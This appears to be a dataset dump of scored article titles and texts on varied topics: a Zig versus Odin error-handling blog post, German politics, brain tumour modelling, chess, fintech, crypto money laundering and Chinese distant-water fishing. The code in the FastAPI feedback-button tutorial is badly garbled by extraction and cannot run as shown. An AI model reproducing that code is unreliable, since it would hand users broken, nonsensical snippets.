labels
float32
1
4.24k
Title
stringlengths
1
91
Text
stringlengths
1
61.1M
1
TRTorch: PyTorch/TorchScript Compiler for Nvidia GPUs Using TensorRT
{{ message }} pytorch/TensorRT You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
173
Looking into Odin and Zig
time to read | I was pointed to the Odin language after my post about the Zig language. On the surface, Odin and Zig are very similar, but they have some fundamental differences in behavior and mindset. I’m basing most of what I’m writing here on admittedly cursory reading of the Odin language docs and this blog post. Odin has a great point on conditional compilation. The if statements that are evaluated at compile time are hard to distinguish. I like Odin’s when clauses better, but Zig has comptime if as well, which make it easier. The actual problem I have with this model in Zig is that it is easy to get to a situation where you write (new) code that doesn’t get called, but Zig will detect that it is unused and not bother compiling it. When you are actually trying to use it, you’ll hit a lot of compilation errors that you need to fix. This is in contrast to the way I would usually work, which is to almost always have the code in compliable state and leaning hard on the compiler to double check my work. Beyond that, I have grave disagreements with Ginger, the author of the blog post and the Odin language. I want to pull just a couple of what I think are the most important points from that post: I have never had a program cause a system to run out of memory in real software (other than artificial stress tests). If you are working in a low-memory environment, you should be extremely aware of its limitations and plan accordingly. If you are a desktop machine and run out of memory, don’t try to recover from the panic, quit the program or even shut-down the computer. As for other machinery, plan accordingly! This is in relation to automatic heap allocations (which can fail, which will usually kill the process because there is no good way to report it). My reaction to that is “640KB is enough for everything”, right? To start with, I write databases for a living. I run my code on containers with 128MB when the user uses a database that is 100s of GB in size. Even if running on proper server machines, I almost always have to deal with datasets that are bigger than memory. Running out of memory happens to us pretty much every single time we start the program. And handling this scenario robustly is important to building system software. In this case, planning accordingly in my view is not using a language that can put me in a hole. This is not theoretical, that is real scenario that we have to deal with. The biggest turnoff for me, however, was this statement on errors: …my issue with exception-based/exception-like errors is not the syntax but how they encourage error propagation. This encouragement promotes a culture of pass the error up the stack for “someone else” to handle the error. I hate this culture and I do not want to encourage it at the language level. Handle errors there and then and don’t pass them up the stack. You make your mess; you clean it. I didn’t really know how to answer that at first. There are so many cases where that doesn’t even make sense that it isn’t even funny. Consider a scenario where I need to call a service that would compute some value for me. I’m doing that as gRPC over TCP + SSL. Let me count the number of errors that can happen here, shall we? My code, which is calling the service, need to be able to handle any / all of those. And probably quite a few more that I didn’t account for. Trying to build something like that is onerous, fragile and doesn’t really work. For that matter, if I passed the wrong URL for the service, what is the code that is doing the gRPC call supposed to do but bubble the error up? If the DNS is returning an error, or there is a certificate issue, how do you clean it up? The only reasonable thing to do is to give as much context as possible and raise the error to the caller. When building robust software, bubbling it up so the caller can decide what to do isn’t about passing the back, it is a b best practice. You only need to look at Erlang and how applications with the highest requirements for reliability are structured. They are meant to fail, error handling and recovery is something that happens in dedicated (supervisors) locations, because these places has the right context to make an actual determination. The killer impact of this, however, is that Zig has explicit notion of errors, while Odin relies on the multiple return values system. We have seen how good that is with Go. In fact, one of the most common issues with Go is the issue with how much manual work it takes to do proper error handling. But I think that the key issue here is that errors as a first class aspect of the language gives us a very powerful ability, errdefer. This single language feature is the reason I think that Zig is an amazing language. The concept of first class errors combine with errdefer makes building complex structures so much easier. Note that I’m opening a file, mapping it to memory, validating its size and then that it has the right hash. I’m using defer to ensure that I cleanup the file handle, but what about the returned memory, in this case, I want to clean it up if there is an error, but not otherwise. Consider how you would write this code without errdefer. I would have to add the “close the map” portion to both places where I want to return an error. And what happens if I’m using more than a couple of resources, I may be needing to do something that require a file, network socket, memory, etc. Any of those operations can fail, but I want to clean them up only on failure. Otherwise, I need to return them to my caller. Using errdefer (which relies on the explicit distinction between regular returns and errors) will ensure that I don’t have a problem. Everything works, and the amount of state that I have to keep in my head is greatly reduce. Consider how you’ll that that in Odin or Go, on the other hand, and you can see how error handling become a big beast. Having explicit language support to assist in that is really nice.
15
Annalena Baerbock: The Green Party's candidate to succeed Angela Merkel
When Annalena Baerbock was named the Green Party's first-ever chancellor candidate in April she was credited for her party's remarkable rise in opinion polls later that month. But then she suffered a barrage of personal attacks, putting her on the defensive, as criticism targeted her personal credibility: Baerbock, who has never held a government office, was accused of minor inaccuracies in her official resume, of a delay in paying taxes on a sizable Christmas bonus, on plagiarizing parts of her new book, and then she used a racial slur in a quote in an interview. Each time Baerbock was quick to apologize. But her approval ratings declined, and the party's campaign did not managed to regain the positive momentum of earlier in the year. Baerbock stepped into the limelight when she was elected party co-chair in 2018. The still-little-known regional politician, a resident of the eastern state of Brandenburg, has since projected herself as an expert on how to tackle climate change. In live TV debates with her two competitors for the chancellorship — Armin Laschet, of the center-right Christian Democrats (CDU), and Olaf Scholz, of the center-left Social Democrats (SPD) — Baerbock scored points with younger voters. She attacked the current CDU-SPD coalition government over its dismal record on climate protection. "We are missing our climate targets, with dramatic consequences, and you have both made clear that you didn't orientate yourselves around the solutions, but just pushed the blame on each other about who was hindering what," she said. Baerbock has been arguing in favor of phasing out coal-powered energy far earlier than the current target date of 2038. She also backs a speed limit of 130 kilometers per hour (78 miles per hour) on the autobahn, as German highways are known, and limiting short-haul flights. She also supports a raise in the minimum wage to €12 ($14) per hour, and she opposes a hike in German defense spending. Baerbock has also spoken out on thorny foreign policy issues, advocating a tough stance on Russia and China over human rights issues. She has also spoken on the threats posed by far-right populism and xenophobia. The Greens have traditionally failed to gain ground in rural areas and especially in eastern Germany. Baerbock and her family of four have long been based in the eastern city of Potsdam. Early on, Baerbock was driven by ambition. Born in 1980 in the small town of Pattensen in Lower Saxony, she was a natural athlete, placing third at Germany's national trampolining championship. She was only 16 when she went to spend a year in the United States. Later, she studied law in Hannover before going on to the London School of Economics, where she studied international law. As a result, Baerbock gives interviews in fluent English — something that, even in this day and age, can't be taken for granted among German politicians. In an interview with DW in early 2021, Baerbock welcomed President Joe Biden's decision to bring the US back into the Paris climate agreement. "We Europeans, including the German government, need to take advantage of the current situation to realize the proposals that the US administration has put forward concerning climate-neutral cooperation," she said. "We need to get moving and point the way towards a European and trans-Atlantic Green Deal." Both Baerbock and her co-party chair, Robert Habeck, have few inhibitions about talking to members of other parties, to seek possible common ground. Initially, there was speculation about a possible conservative-Green coalition in Berlin after the 2021 election, but, with the SPD rising in the polls, Baerbock began to stress that a center-left coalition would be her preference. Germany needs a new beginning, Baerbock stressed during her campaign, pointing out that her two competitors were both in their early 60s. "That can only happen with Greens in a leading role," she said, stressing that all democratic parties would have to talk to each other. In doing so, she included the Left Party. She warned strongly against equating the Left with the far-right Alternative for Germany. This is a reworked and updated version of an article that was first published on April 3, 2021. While you're here: Every Tuesday, DW editors round up what is happening in German politics and society, with an eye toward understanding this year’s elections and beyond. You can sign up here for the weekly email newsletter Berlin Briefing, to stay on top of developments as Germany enters the post-Merkel era.
1
New Technique Predicts Response of Brain Tumors to Chemoradiation – UT News
AUSTIN, Texas — A team studying malignant brain tumors has developed a new technique for predicting how individual patients will respond to chemoradiation, a major step forward in efforts to personalize cancer treatment. Researchers at The University of Texas at Austin’s Oden Institute for Computational Engineering and Sciences, Texas Advanced Computing Center (TACC) and The University of Texas MD Anderson Cancer Center have merged various quantitative imaging measurements with computational simulations to create an accurate model for calculating the progression of high-grade glioma. High-grade gliomas are the most common cancerous primary brain tumors found in adults. Current treatments involve surgical resection of the tumor followed by radiation therapy and chemotherapy. Despite this aggressive treatment, prognosis for patients who undergo this approach is generally poor. The growth and behavior of these tumors varies from patient to patient, making the need for techniques to personalize therapy on an individual patient level particularly important. In a paper published in Nature Scientific Reports , the authors used a combination of anatomical and structural imaging to inform a computational mechanistic model that predicts for high-grade glioma tumor progression. “This project couldn’t be attempted without close collaboration between engineers and clinicians,” said David Hormuth of the Center for Computational Oncology at UT Austin’s Oden Institute. “Our approach of using individual patient imaging data in a predictive mechanistic model, that incorporates both the anatomical appearance of the tumor on MRI and measurements from a specific MRI scanning technique called diffusion tensor imaging, is showing real promise,” said Dr. Caroline Chung of MD Anderson. Current radiation therapy methods are already tailored to patients using mostly anatomical imaging data prior to the start of radiation therapy and can be adapted in reaction to major changes in tumor appearance during treatment. However, this new technique is a first step toward providing radiation oncologists with the information they need to personalize treatment plans based on a predicted spatial map of the tumor’s resistance to radiation. Throughout this project, researchers at the Oden Institute and MD Anderson have gone back and forth on the type of data needed, model components and the overall goal or application of this model. The Oden Institute brought the expertise in tumor mechanics and modeling, an innovative, physics-based research approach led by Tom Yankeelov of UT Austin over several years. Once paired with Chung’s quantitative imaging and clinical brain tumor expertise, the researchers successfully translated prior preclinical efforts in high-grade glioma. TACC, the third partner in the collaboration to end cancer, made it possible for the researchers to simultaneously calibrate a large family of biologically based mathematical models for each patient. “In total, we had roughly 6,000 different calibrations or forecast scenarios that would take years to run on a standard laptop,” Hormuth said. “By using the Lonestar 5 system to run our model calibration and forecasting approach in parallel, we were able to evaluate all of these scenarios in a matter of days.”
2
Norway’s Magnus Carlsen wins FIDE world chess championship
Related topics Norway’s Magnus Carlsen wins FIDE world chess championship p 1 of 12 Ian Nepomniachtchi of Russia, left, and Magnus Carlsen of Norway, right, compete during the FIDE World Championship at Dubai Expo 2020 in Dubai, United Arab Emirates, Friday, Dec. 10, 2021. (AP Photo/Jon Gambrell) 1 of 12 Ian Nepomniachtchi of Russia, left, and Magnus Carlsen of Norway, right, compete during the FIDE World Championship at Dubai Expo 2020 in Dubai, United Arab Emirates, Friday, Dec. 10, 2021. (AP Photo/Jon Gambrell) DUBAI, United Arab Emirates (AP) — Reigning world chess champion Magnus Carlsen of Norway defended his title and won the FIDE World Championship on Friday in Dubai. He beat Ian Nepomniachtchi of Russia, securing the one point he needed to cross the seven point threshold to win the global tournament held at Dubai’s Expo 2020 this month in the United Arab Emirates. After a surprise blunder by Nepomniachtchi, Carlsen clinched his fifth world championship title. Up until that point, the match was tense with games ending in draw after draw. “Then everything kind of clicked. I think after that it all went my way,” Carlsen told reporters from the world’s fair after his win. “You don’t expect necessarily to run away with it in a world championship.” Carlsen wins 60% of the 2 million-euro prize offered by the championship. Nepomniachtchi said he was struggling to understand exactly what went wrong and at the moment had “no idea.” “The things that happened to me here never happened to me basically at any events ... in my career I lost quite some stupid games,” Nepomniachtchi said grimly. “I should find out why it happened.”
2
Creating a feedback button with FastAPI and hyperscript
Feedback is one of the most importante things when you are creating a product (probably the most important one!), so it should be easy for users to give feedback. In this post we’ll see how to implement a feedback button easily. This exact code is what I’m using at drwn.io, a little project I’m working on with a friend. The button does the following: after you use it, it will change its text to “Thank you!”, then it will fade out we will have our backend handle the message. Let’s see it in action: The first thing we need is an html button, it’s styled using Tailwind CSS. Notice the _="on click ...", this is where we will put our hyperscript code. To use hyperscript, add this to your page’s <head> . (Now I’m using version 0.0.3, make sure to update it if you are reading it in the future) < script src = "https://unpkg.com/[email protected]" > script > And now our HTML button with hyperscript: < div pp = "get-feedback-div" pp = "inline-flex ml-3 transition-opacity duration-500 ease-in rounded-md shadow" > p< button pp = "get-feedback-button" p_ = "on click call getFeedback() then set #get-feedback-button.innerText to 'Thank you!' then wait 1000ms then toggle .opacity-0 on #get-feedback-div then wait 600ms then toggle .hidden on #get-feedback-div" pp = "inline-flex items-center justify-center px-5 py-3 text-base font-medium text-blue-600 bg-white border border-transparent rounded-md hover:bg-blue-50" p> p pp button > p div > We can go step-by-step with hyperscript: on click call getFeedback(): when the button is clicked, execute the function getFeedback() (explained later). then set #get-feedback-button.innerText to 'Thank you!': after that, get the element with id get-feedback-button and change the innerText to 'Thank you!' then wait 1000ms: self-explanatory I guess then toggle .opacity-0 on #get-feedback-div: toggle the CSS class opacity-0 in the element with id get-feedback-div then wait 600ms then toggle .hidden on #get-feedback-div: finally, wait again and toggle the class hidden on the element What I love about hyperscript is: The code is all in one place, I don’t have to go back and forth between javascript and html files It feels like I’m writing in a declarative language. I tell it what I want, and it does it. Now our getFeedback() function. It’s straightforward, use prompt() to get a message, if the user writes something, send a JSON request to the /feedback_prompt endpoint. p getFeedback () { pp message = prompt ( "Write your message here:" , "" ); pp ( message != "" ) { pp data = { msg : message }; pp ( "/feedback_prompt" , { pp : "POST" , pp : { pp : "application/json" , pp pp : JSON . stringify ( data ), pp p. then () p. catch (( error ) => { pp ( "There was an error sending your message, please try it later." ); pp p} } And now our backed with FastAPI to wrap everything up. We have an endpoint that reads the message and passes it to a notify() function. This function can be whatever you want, in my projects it’s usually sending the message to telegram, slack and/or email. p pydantic import BaseModel p fastapi import FastAPI p = FastAPI () p p p notify ( message : str ): p message p FeedBackPrompData ( BaseModel ): p   msg : str p ( "/feedback_prompt" ) p def feedback_post ( data : FeedBackPrompData ): p   content = f "Feeback from drwn.io: \n\n { data . msg } " p   notify ( content ) p   return And that’s it, we now have a working full-stack system to have a feedback button.
4
Berkshire leads $750M Nubank funding round, values it at $30B
June 8 (Reuters) - Warren Buffett's Berkshire Hathaway Inc(BRKa.N) invested $500 million in Brazil's Nubank, giving the fast-growing fintech a big vote of confidence as it seeks to widen its footprint across Latin America. Nubank, best known as a credit card issuer, also said it raised an additional $250 million from a series of other investors. The new investments give Nubank a $30 billion valuation, up from $25 billion at the time of its previous fundraising round, according to a source familiar with the situation. That would make the upstart bank worth just slightly less than Banco Santander Brasil SA (SANB3.SA), Brazil's No. 3 bank, which has more than 2,000 branches. The transaction also vaults Nubank into the upper echelons of fintechs worldwide, on a par with brokerage startup Robinhood Markets Inc and China's Lufax but still far behind Ant Group. Nubank, which has 40 million clients, said in a statement it plans to use the proceeds to fund its international expansion to Mexico and Colombia, launch new products and services and hire more employees. The arrival of such high-profile investors, who usually invest in publicly traded companies, gives a hint on how close Nubank is to a listing. Earlier in April, Reuters reported that Nubank had initiated preparations for a U.S. stock market listing which could come as early as this year, according to sources familiar with the matter. read more Nubank is Warren Buffett's second bet on a Brazilian financial startup. His Berkshire Hathaway also acquired a stake in payments company StoneCo Ltd (STNE.O) almost three years ago, when it went public. A highly concentrated financial market, in which the five top lenders hold almost 78% of the country's total assets, Brazil has been a hotbed for fintech growth. Online banking has reduced costs for newcomers and the central bank has created new rules to encourage competition, aiming at lower fees and interest rates for consumers. Nubank's $750 million new funding round is part of its series G fundraising round, which totaled $1.15 billion. An initial part of the series G round was announced in January. Other participants in the round included Sands Capital, Canada Pension Plan Investment Board, MSA Capital, Advent's Sunley House Capital and Brazilian asset managers Verde Asset Management and Absoluto Partners. Reporting by Noor Zainab Hussain in Bengaluru; Editing by Maju Samuel Our Standards: The Thomson Reuters Trust Principles.
1
️ AI created natural sounding voices for your YouTube videos ⭐️⭐️⭐️⭐️⭐️
Advanced video and audio (text-to-speech) editor Manage your voice over videos or audio files in projects. Edit your videos in our modern voice over editor. Our video editor also allow time stretch. Customize speech with pitch and speech speed controls. Allow faster or slower speech. Add sound or accent to a selected word. You can even let the voice whisper or breathe. Natural sounding voice We convert text to natural sounding language. Using a powerful neural network, we produce first-class audio data. We support Speech Synthesis Markup Language (SSML). Check out our SSML-Editor tutorial. Easy to use in your browser Select your video (without upload) and enter your text directly below the video and a voice will be automatically generated. Automatic translation Automatically convert your voice over or text-to-speech in multiple languages. The automatic translation makes this possible with just one click. Convert Text to Speech to MP3 You can save all text-to-speech you have created to MP3, WAV, MP4 (Video). Also a batch processing with Text to Speech is possible, import e.g. your ebooks and convert them to speech. Add Background Music Add background music to your video or audio files using SSML tags. Create ready to use YouTube Videos Create voice-overs for your YouTube videos. Explainer Videos, tutorials, screencasts and more. And save your video directly as MP4. Video and audio transcription Transcribe your audio and translate it automatically. Dub and translate your video automatically with transcribe and text to speech. Screen Recorder You have the possibility to record a video (e.g. screencast) directly with your browser and create a voice over for it.
2
270 Addresses are responsible for 55% of all cryptocurrency money laundering
Tech Home Tech Security 270 addresses are responsible for 55% of all cryptocurrency money laundering Most cryptocurrency money laundering is concentrated in a few online services, opening the door for law enforcement actions. Image: Chainalysis Criminals who keep their funds in cryptocurrency tend to launder funds through a small cluster of online services, blockchain investigations firm Chainalysis said in a report last week. This includes services like high-risk (low-reputation) crypto-exchange portals, online gambling platforms, cryptocurrency mixing services, and financial services that support cryptocurrency operations headquartered in high-risk jurisdictions. Criminal activity studied in this report included cryptocurrency addresses linked to online scams, ransomware attacks, terrorist funding, hacks, transactions linked to child abuse materials, and funds linked to payments made to dark web marketplaces offering illegal services like drugs, weapons, and stolen data. But while you'd expect that the money laundering resulting from such a broad spectrum of illegal activity to have taken place across a large number of services, Chainalysis reports that just a small group of 270 blockchain addresses have laundered around 55% of cryptocurrency associated with criminal activity. Furthermore, expanding this group further, Chainalysis says that 1,867 addresses received 75% of all criminally-linked cryptocurrency funds in 2020, a sum estimated at around $1.7 billion. Image: Chainalysis "This level of concentration is greater than in 2019," Chainalysis researchers said in a report published last week. "In particular, we see a much greater share of illicit cryptocurrency going to addresses taking in between $1 million and $100 million worth of cryptocurrency per year." "We believe the growing concentration of deposit addresses receiving illicit cryptocurrency reflects cybercriminals' increasing reliance on a small group of OTC (over-the-counter) brokers and other nested services specializing in money laundering." Compared to three years ago, when criminal groups used a wider array of services, Chainalysis says this bottleneck in money laundering operations is good news. The company believes that the cryptocurrency-related money laundering field is now in a vulnerable position where a few well-orchestrated law enforcement actions against a few cryptocurrency operators could cripple the movement of illicit funds of many criminal groups at the same time. Furthermore, additional analysis also revealed that many of the services that play a crucial role in money laundering operations are also second-tier services hosted at larger legitimate operators. In this case, a law enforcement action wouldn't even be necessary, as convincing a larger company to enforce its anti-money-laundering policies would lead to the shutdown of many of today's cryptocurrency money laundering hotspots. Cryptocurrency cyberattacks and breaches of 2019 (in pictures) Editorial standards Related AI could automate 300 million jobs. Here's which are most (and least) at risk The cheapest VPNs (that won't slow down your connection) You can now send Snapchat's AI chatbot photos and get a response (warning, it's creepy)
5
Great Wall of Lights: China's sea power on Darwin's doorstep
Great Wall of Lights: China’s sea power on Darwin’s doorstep Joshua Goodman APJoshGoodman jgoodman@ap.org ABOARD THE OCEAN WARRIOR in the eastern Pacific Ocean (AP) — It’s 3 a.m., and after five days plying through the high seas, the Ocean Warrior is surrounded by an atoll of blazing lights that overtakes the nighttime sky. “Welcome to the party!” says third officer Filippo Marini as the spectacle floods the ship’s bridge and interrupts his overnight watch. It’s the conservationists’ first glimpse of the world’s largest fishing fleet: an armada of nearly 300 Chinese vessels that have sailed halfway across the globe to lure the elusive Humboldt squid from the Pacific Ocean’s inky depths. As Italian hip hop blares across the bridge, Marini furiously scribbles the electronic IDs of 37 fishing vessels that pop up as green triangles on the Ocean Warrior’s radar onto a sheet of paper, before they disappear. Immediately he detects a number of red flags: two of the boats have gone ‘dark,’ their mandatory tracking device that gives a ship’s position switched off. Still others are broadcasting two different radio numbers — a sign of possible tampering. The Associated Press with Spanish-language broadcaster Univision accompanied the Ocean Warrior this summer on an 18-day voyage to observe up close for the first time the Chinese distant water fishing fleet on the high seas off South America. The vigilante patrol was prompted by an international outcry last summer when hundreds of Chinese vessels were discovered fishing for squid near the long-isolated Galapagos Islands, a UNESCO world heritage site that inspired 19th-century naturalist Charles Darwin and is home to some of the world’s most endangered species, from giant tortoises to hammerhead sharks. China’s deployment to this remote expanse is no accident. Decades of overfishing have pushed its overseas fleet, the world’s largest, ever farther from home. Officially capped at 3,000 vessels, the fleet might actually consist of thousands more . Keeping such a sizable flotilla at sea, sometimes for years at a time, is at once a technical feat made possible through billions in state subsidies and a source of national pride akin to what the U.S. space program was for generations of Americans. Beijing says it has zero tolerance for illegal fishing and points to recent actions such as a temporary moratorium on high seas squid fishing as evidence of its environmental stewardship. Those now criticizing China, including the U.S. and Europe, for decades raided the oceans themselves. But the sheer size of the Chinese fleet and its recent arrival to the Americas has stirred fears that it could exhaust marine stocks. There’s also concern that in the absence of effective controls, illegal fishing will soar. The U.S. Coast Guard recently declared that illegal fishing had replaced piracy as its top maritime security threat . Meanwhile, activists are seeking restrictions on fishing as part of negotiations underway on a first-ever High Seas Treaty, which could dramatically boost international cooperation on the traditionally lawless waters that comprise nearly half of the planet. Of the 30 vessels the AP observed up close, 24 had a history of labor abuse accusations, past convictions for illegal fishing or showed signs of possibly violating maritime law. Collectively, these issues underscore how the open ocean around the Americas — where the U.S. has long dominated and China is jockeying for influence — have become a magnet for the seafood industry’s worst offenders. Specifically, 16 ships either sailed with their mandatory safety transponders turned off, broadcast multiple electronic IDs or transmitted information that didn’t match its listed name or location — discrepancies that are often associated with illegal fishing, although the AP saw no evidence that they were engaged in illicit activity. Six ships were owned by companies accused of forced labor including one vessel, the Chang Tai 802, whose Indonesian crew said they had been stuck at sea for years. Another nine ships face accusations of illegal fishing elsewhere in the world while one giant fuel tanker servicing the fleet, the Ocean Ruby, is operated by the affiliate of a company suspected of selling fuel to North Korea in violation of United Nations sanctions. Yet another, the Fu Yuan Yu 7880, is operated by an affiliate of a Nasdaq-traded company, Pingtan Marine Enterprise, whose Chinese executives had their U.S. visas cancelled for alleged links to human trafficking. “Beijing is exporting its overfishing problem to South America,” said Captain Peter Hammarstedt, director of campaigns for Sea Shepherd, a Netherlands-based ocean conservation group that operates nine well-equipped vessels, including the Ocean Warrior. “China is chiefly responsible for the plunder of shark and tuna in Asia,” says Hammarstedt, who organized the high seas campaign, called Operation Distant Water, after watching how illegal Chinese vessels ravaged poor fishing villages in West Africa. “With that track record, are we really supposed to believe they will manage this new fishery responsibly?” The roar of the mechanical jiggers pulling the catch from the ocean’s depths can be heard hundreds of feet away before you come upon the floating slaughterhouse. The stench too, as the highly aggressive squid blow their ink sacs in one final, futile effort to avoid their inexorable fate. By all accounts, the Humboldt squid — named for the nutrient-rich current found off the southwest coast of South America — is one of the most abundant marine species. Some scientists believe their numbers may even be thriving as the oceans warm and their natural predators, sharks, and tuna, are fished out of existence. But biologists say they’ve never faced a threat like the explosion of industrial Chinese fishing off South America. The number of Chinese-flagged vessels in the south Pacific has surged 10-fold from 54 active vessels in 2009 to 557 in 2020, according to the South Pacific Regional Fisheries Management Organization , or SPRFMO, an inter-governmental group of 15 members charged with ensuring the conservation and sustainable fishing of the species. Meanwhile, the size of its catch has grown from 70,000 tons in 2009 to 358,000. Fishing takes place almost exclusively at night when each ship turns on hundreds of lights as powerful as anything at a stadium to attract swarms of the fast-flying squid. The concentration of lights is so intense it can be seen from space on satellite images that show the massive fleet shining as brightly as major cities hundreds of miles away on land. The Chinese squid fishing fleet at night as seen from space. (Images by NASA) “It really is like the Wild West,” said Hammarstedt. “Nobody is responsible for enforcement out there.” Experts warn that even a naturally bountiful species like squid is vulnerable to overfishing. Although it’s unknown how many Humboldt squid remain, they point to past disappearance of squid stocks in Argentina, Mexico, and Japan as cause for concern. “If you have a vast resource and it’s easy to take, then it’s easy to fall into the trap of thinking that this is limitless, that it’s just stars in the sky,” said William Gilly, a Stanford University marine biologist. “If humanity puts its mind to it, there’s no limit to the damage we can do.” Gilly said squid are also a key barometer of marine environments — a biological conveyor belt transporting energy from tiny carbon-absorbing plankton to longer-living predators, like sharks and tuna, and ultimately, human beings. A Chinese-flagged jigger uses powerful nighttime lights to fish for Humboldt squid on the high seas near the Galapagos Islands. “The people who fish squid are happy,” said Daniel Pauly, a prominent marine biologist who in the 1990s coined the phrase “fishing down the food web” to describe how previously spurned chum were replacing bigger fish on dinner plates. “But this is part of the gradual degradation of the ocean.” For dozens of Chinese ships, the journey to the warm equatorial waters near the Galapagos began months earlier, on the opposite side of South America, where every Austral summer, between November and March, hundreds of foreign-flagged jiggers scoop up untold amounts of shortfin squid in one of the world’s largest unregulated fishing grounds. The plunderer’s paradise lies between Argentina’s maritime border and the British-held Falkland Islands in a Jamaica-sized no man’s land where fishing licenses, catch limits and oversight are non-existent. Between November 2020 and May 2021, a total of 523 mostly Chinese fishing vessels — 35% more than the previous season — were detected just beyond the boundary of Argentina’s 200-nautical mile exclusive economic zone, according to satellite data analyzed by Windward, a maritime intelligence firm. Of that amount, 42% had turned off at least once their safety transponders. Meanwhile, 188 of those same vessels showed up near the Galapagos, including 14 Chinese vessels that went offline in both oceans for an average 34 hours each time. Feb. 22, 2018 incident in which the Argentine Coast Guard chased a Chinese fishing boat that had moved within Argentina's exclusive economic zone. It’s impossible to know what the ships did while they were ‘dark.’ However, sometimes ships turn off their tracking systems to avoid detection while carrying out illicit activities. Argentine authorities over the years have spotted numerous Chinese vessels off the grid fishing illegally in its waters, once even firing shots into and sinking a trawler that tried to ram its pursuer near a whale breeding ground. Under a United Nations maritime treaty, to which China is a signatory, large ships are required to continuously use what’s known as an automated identification system, or AIS, to avoid collisions. Switching it off, except in cases of an imminent threat, for example hiding from pirates, is a major breach that should lead to sanctions for a vessel and its owner under the law of the nation to which it is flagged. But China until now appears to have done little to rein in its distant water fleet. The Chinese fleet is able to fish for sometimes years at a time because they can offload their catch at sea into a network of giant refrigerated vessels, or reefers, capable of hauling more than 15,000 cubic meters of fish — enough to fill six Olympic-sized pools — to port. Giant tankers provide cheap fuel heavily subsidized by the Chinese government, adding to the environmental burden. The 12 reefers active in the Pacific this past July as the Ocean Warrior was patrolling nearby had at least 196 encounters with fishing vessels during that period, according to satellite data analyzed by Global Fishing Watch, a group that supports sustainable fishing. Nearly 11% of total U.S. seafood imports in 2019 worth $2.4 billion came from illegal, unreported and unregulated fishing, according to the U.S. International Trade Commission, a federal agency. Outside the U.S., the problem is believed to be even worse. “We don’t know if things are getting better or worse,” said Boris Worm, a marine biologist at Dalhousie University in Halifax, Canada. “It basically comes down to who you believe.” In the seascape of the world’s oceans, Pingtan Marine and its affiliates have left in their wake accusations of illegal fishing by authorities in places as diverse as South Africa, Timor Leste, Ecuador, and Indonesia. But the company is not some rogue outfit. It boasts China’s second-largest overseas fleet , trades shares on the U.S. Nasdaq, and in its home port of Fuzhou, across from Taiwan, is helping build one of the world’s largest fish factories. The company’s Chairman and CEO, Zhou Xinrong, appears to have built the fishing empire through massive state loans, generous subsidies, and Communist Party connections. “It’s not just a fishing company — it’s practically a Chinese government asset,” said Susi Pudjiastuti, who as Indonesia’s former fishing minister between 2014 and 2019 was lionized by conservationists for destroying hundreds of illegal foreign fishing vessels. Fifty-seven of Pingtan’s ships, including three refrigerated carrier vessels, all of them owned directly or through an affiliate, were registered by China in the past few years to fish in the south Pacific, according to C4ADS, a Washington-based think tank that last year authored a report on illegal fishing . Pingtan in its last earnings report almost a year ago said that it had $280 million in outstanding loans from the China Development Bank and other state lenders. One of the country’s biggest state investment funds owns an 8% stake in one of its subsidiaries. Meanwhile, Chinese state subsidies to Pingtan for the building of vessels totaled $29 million in the first nine months of last year — about a third of all its purchases of property and equipment. As part of Pudjiastuti’s crackdown, vessels operated by two Pingtan affiliates in Indonesia had their licenses revoked for a slew of alleged offenses ranging from falsifying catch reports, illegal transshipments, and the smuggling of endangered species. Those affiliates, PT Avona Mina Lestari and PT Dwikarya Reksa Abad, are managed or partly owned by members of Zhou’s immediate family, Pingtan disclosed in filings with the U.S. Securities and Exchange Commission. Crew members of one vessel told authorities they had been “gang-beaten,” hit on their heads with a piece of steel and subjected to “torture” by their Chinese supervisors, according to an Indonesian court ruling upholding the ban on the Pingtan affiliate. A Panama-flagged carrier vessel, the Hai Fa, whose listed owner is a different Pingtan affiliate based in Hong Kong, was seized in 2014 with 900 tons of illegally caught fish, including endangered shark species. A lenient court later released the vessel from custody after it paid a $15,000 fine. An entity majority-owned by Zhou’s wife also operates the Fu Yuan Yu Leng 999, which was caught in 2017 transiting through the Galapagos Marine Reserve with more than 6,000 dead sharks on board. Another Pingtan-affiliated vessel spotted by AP, the Fu Yuan Yu 7880, was arrested by South Africa in 2016 after it tried to flee a naval patrol that suspected it of illegal squid fishing. The ship’s officers were found guilty of possessing illegal gear and disobeying a maritime authority but were released after paying a fine. “The more you learn about these vessels and equipment, the harder it is to sleep at night,” said Pudjiastuti. “These South Americans should wake up as early as possible.” Pingtan didn’t answer a detailed list of questions. “Pingtan doesn’t answer questions raised by the media,” the company said in an e-mail. As scandal has followed Pingtan and its affiliates around the world, investors have dumped the company’s stock. In June, Nasdaq sent notice that it would delist the company unless its share price, which has tumbled nearly 80% the last two years, crawls back above a minimum $1 threshold soon. The threat of delisting followed the abrupt resignation of the company’s independent auditor, which warned about Pingtan’s ability to continue doing business. Pingtan told the SEC that its failure to file any quarterly reports for nearly a year was due to a “material weakness” in its ability to conform with U.S. accounting practices. One decision that Pingtan has also not commented on is the surprise U.S. sanction of its top executives. Two U.S. officials said that CEO Zhou Xinrong and his wife were among the 15 individuals who had their visas cancelled last year for being “complicit” in illegal fishing and human trafficking . The decision, taken in the waning days of the Trump administration, was the first of its kind specifically targeting abuse in the fishing industry, the two officials said on the condition of anonymity to discuss internal deliberations. Criticism of China’s distant water fishing fleet has spurred some reform. Last year, China imposed stricter penalties on companies caught breaking the rules, including manipulating their transceivers. They’ve also boosted reporting requirements for transshipments on the high seas, banned blacklisted vessels from entering Chinese ports and ordered off-season moratoriums on squid fishing in the high seas near Argentina and Ecuador. Video produced and edited by Peter Hamlin The measures, while far from a panacea, nonetheless mark a giant leap for the world’s largest consumer and producer of fish products. “I used to go to conference and officials would be in just complete denial,” said Tabitha Mallory, a China scholar at the University of Washington who specializes in the country’s fishing policies. “At least now, they’re acknowledging that their fishing is unsustainable, even if it’s just to counter all the negative pushback they’re getting around the world.” China’s Foreign Ministry, the Bureau of Fisheries and the China Overseas Fisheries Association, an industry group, didn’t respond to multiple requests for an interview nor a detailed list of questions. China’s distant water fishing fleet launched in the 1980s as a response to depleting fish stocks at home and the need to feed its fast-growing population. But it’s evolved into a thriving industry and an important part of China’s geopolitical push to secure access to the world’s dwindling natural resources, says Mallory. In the eastern city of Zhoushan, home to China’s largest distant water fleet, an ultramodern “Squid Museum” opened this year that allows visitors to follow the squid on a sanitized, adventure-filled 3D journey from the ocean depths to the giant jiggers and their eventual processing back at home into squid rings. Researcher Pauly believes that much of the criticism of the Chinese fleet’s fishing around the Galapagos is attributed to growing anti-China sentiment in the U.S. and sensitivities about Beijing’s growing presence in what has traditionally been considered 